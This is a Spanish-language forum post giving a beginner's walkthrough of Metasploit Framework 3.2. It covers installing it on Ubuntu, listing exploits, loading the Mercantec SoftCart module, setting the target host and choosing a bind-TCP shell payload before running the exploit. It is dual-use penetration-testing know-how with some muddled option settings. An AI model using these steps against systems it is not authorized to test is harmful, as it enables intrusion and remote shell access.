link:
Metasploit Framework
Este post no es un estimulante para lammer's, no soy hacker ni cracker, ni peluchin, soy un simple aprendis del area la cual me fencanta!.
Antes de leer
Definiciones:
¿Que es un exploit?
Un exploit es un trozo de programa, es un script, o una secuencia de comandos que tienen como fin aprobechar un fallo o vulnerabilidad de otro sistema, programa hardware para tomar sierto control. Estos alteran el funcionamiento de un programa con el fin de obtener un resultado.
¿Que es un bug?
Con mis palabras!!!jaja
es un error en un programa, que como consecuencia permite la manipulación total o permanente de siertos datos.
entonces..............
si un programa tiene un error o vulneravilidad (bug) en su codigo fuente, el exploit aprobecha este para manipular el funcionamiento del mismo, existen exploit's para conseguir el hash del administrador (hash es la cadena generada por un algoritmo criptografico, con el fin de codificar texto plano, archivos, etc...), otros exploit's se utilizan para colapzar un sistema (DOS, DDOS).
Metasploit Framework
Esta herramienta para la realizar tests de intrusión en redes o en servidores. muy util a la hora de probar la funcionalidad he integridad nuestro servidor, en cuanto a seguridad se refiera, este software de codigo abierto, contiene un arsenal de exploit's, que permiten la ejecución de comandos externos o locales con el fin de saturar un servidor (Denial of service)) , obtener el hash del admin(injection sql o otra técnica). El tipo de exploit usado varia segun el tipo de vulneravilidad que tenga el ordenador y/o servidor.
ya entendimos algo basico , ahora a la accion!
¿como instalar metasploit framework?
para ubuntu:
1-ingresamos a http://www.metasploit.com/framework/ y descargamos el programa segun nuestro sistema operativo en mi caso ubuntu, una vez descargado lo pasamos al /home de nuestro linux,
2-luego instalamos las librerias y aplicativos para que funcione el soft, abrimos la consola, o terminal de ubuntu y escribimos lo siguiente:
sudo apt-get install ruby libruby rdoc
sudo apt-get install libyaml-ruby
sudo apt-get install libzlib-ruby
sudo apt-get install libopenssl-ruby
sudo apt-get install libdl-ruby
sudo apt-get install libreadline-ruby
sudo apt-get install libiconv-ruby
sudo apt-get install rubygems *
sudo gem install -v=1.2.2 rails
3- descomprimimos el framework.tar.gz, utilizando el terminal o konsola con el siguiente comando:
tar xvzf framework-3.2.tar.gz
4- abrimos el terminal y ya podemos usarlo, supongamos que tenemos nuestro archivo descomprimido en /home/Desktop/framework-3.2/framework-3.2/ o sea nuestro escritorio
entonces para ejecutar la consola de comandos de framework, debemos ejecutar lo siguiente:
./mfsconsole [presionamos enter]
esto abre la consola de framework si todo sale bien tendria que salir un..........
_______________________MI CONSOLA_____________________________________________________
administrador@ubuntu-k3:~$ cd Desktop/framework-3.2/framework-3.2
administrador@ubuntu-k3:~/Desktop/framework-3.2/framework-3.2$ ./msfconsole
_ _
_ | | (_)_
____ ____| |_ ____ ___ ____ | | ___ _| |_
| / _ ) _)/ _ |/___) _ | |/ _ | | _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|____)___)_||_(___/| ||_/|_|___/|_|___)
|_|
=[ msf v3.2-release
+ -- --=[ 320 exploits - 217 payloads
+ -- --=[ 20 encoders - 6 nops
=[ 99 aux
msf >
_______________________________________________________________________________________
entonces para visualizar todos los exploit ejecutamos despues de "MSF>" escribimos "show exploits", y nos responderia con:
___________________________MI CONSOLA__________________________________________________
msf > show exploits
Exploits
========
Name Description
---- -----------
bsdi/softcart/mercantec_softcart Mercantec SoftCart CGI Overflow
freebsd/tacacs/xtacacsd_report XTACACSD <= 4.1.2 report() Buffer Overflow
hpux/lpd/cleanup_exec HP-UX LPD Command Execution
irix/lpd/tagprinter_exec Irix LPD tagprinter Command Execution
linux/games/ut2004_secure Unreal Tournament 2004 "secure" Overflow (Linux)
linux/http/gpsd_format_string Berlios GPSD Format String Vulnerability
linux/http/linksys_apply_cgi Linksys apply.cgi b
________________________________________________________________________________________________
la lista sigue pero es muy denso para quien lo lea....
ahora esto podemos visualizar los nombres de cada exploit y una descripcion del mismo........
¿como usamos el exploit?
utilizamos el comando "use", para usar un exploit siguiendo con el nombre del exploit ejemplo!, utilizaremos el primer exploit de la lista que se llama "bsdi/softcart/mercantec_softcart", porque quiero atacar un sistema con Mercantec SoftCart CGI :
__________________________MI CONSOLA__________________________________________________
msf > use bsdi/softcart/mercantec_softcart
________________________________________________________________________________________________
y responde con:
__________________________MI CONSOLA__________________________________________________
msf > use bsdi/softcart/mercantec_softcart
msf exploit(mercantec_softcart) >
________________________________________________________________________________________________
ahora para ver la opciones de ataque de este exploit ejecutaremos "show options":
__________________________MI CONSOLA__________________________________________________
msf > use bsdi/softcart/mercantec_softcart
msf exploit(mercantec_softcart) >show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no Use a proxy chain
RHOST yes The target address
RPORT 80 yes The target port
SSL false no Use SSL
URI /cgi-bin/SoftCart.exe no The target CGI URI
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 BSDi/4.3 Bruteforce
msf exploit(mercantec_softcart) >
________________________________________________________________________________________________
creo que con un poquito de ingles van a sabr utilizarlo, es un programa muy intutivo pero igual explicare!:
una vez parados en "msf exploit (nombrede_nuestroexploit) >"utilizaremos las opciones que nos brindo con el "show options" configuraremos RHOST en mi caso 192.168.1.12, y el target o el objetivo o sistema a verificar sus respectivas vulneravilidades, en este caso flashiare y pondre un ipcualquiera por las dudas de que algun lame quiera kakekar, usare 255.255.255.1:
__________________________MI CONSOLA__________________________________________________
msf exploit(mercantec_softcart) > set RHOST 192.168.1.12
msf exploit(mercantec_softcart) >check
msf exploit(mercantec_softcart) > set TARGET 255.255.255.1
________________________________________________________________________________________________
luego tenemos proxy's para configurar y otras cosillas como el ssl, que son opcionalen los cuales se configuran con el comando "set nombre de opcion", ejemplos "set RHOST xxx.xxx.xxx.xxx, set TARGET xxx.xxx.xxx.xxx"
y por fin elegimos nuestro payload:
__________________________MI consola________________________________________________________
msf exploit(mercantec_softcart) > show payloads
Compatible payloads
===================
Name Description
---- -----------
bsdi/x86/shell/bind_tcp BSDi Command Shell, Bind TCP Stager
bsdi/x86/shell/reverse_tcp BSDi Command Shell, Reverse TCP Stager
bsdi/x86/shell_bind_tcp BSDi Command Shell, Bind TCP Inline
_______________________________________________________________________________________________
cargas el payload con el comando "set PAYLOAD nombre_del_payloads"
__________________________MI CONSOLA__________________________________
msf payload(bind_tcp) > set PAYLOAD bsdi/x86/shell/bind_tcp
PAYLOAD => bsdi/x86/shell/bind_tcp
msf payload(bind_tcp) >
_________________________________________________________________________
tiramos un comando para mostrar las opciones del payload cargado,con un "show options"
_____________________MI CONSOLA___________________________
msf payload(bind_tcp) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The local port
RHOST no The target address
msf payload(bind_tcp) >
_________________________________________________________________
una vez fijadas las opciones y variables, configuramos las variables con "show advanced", y responde con el xploit cargado anteriormente y el payload correspondiente ahora no queda mas que escribir el comando "exploit", y esto ejecutara el exploit atacando al sistema antes declarado, en el target.
para mas información www.google.com, youtube.com (para videos tutoriales).
aca dejo un ejemplo en flash que no ise yo! ja, http://www.irongeek.com/i.php?page=videos/metasploit1 esta bueno en ingles lastima!, no hay muchos tutos en español.
espero hallan entendido este tipo de geroglifos.
perdon por las faltas de ortografias y por la falta de capturas de pantalla.
peluchin es un poroto al lado mio...jajajaaj
cualquier duda o pregunta, correccion sera bienvenida siempre y cuando sean formulados de la forma correcta, nose lo aclaro porque me gusta que me pregunten siempre y cuando pueda contestar, y me gusta asumir errores siempre y cuando pueda corregirlos, sin olvidar que no me gusta que bardeen al pobre peluchin jajajaja bye!!! 4m0 a 74R1N64!!
PD:Espero que lo usen con responzabilidad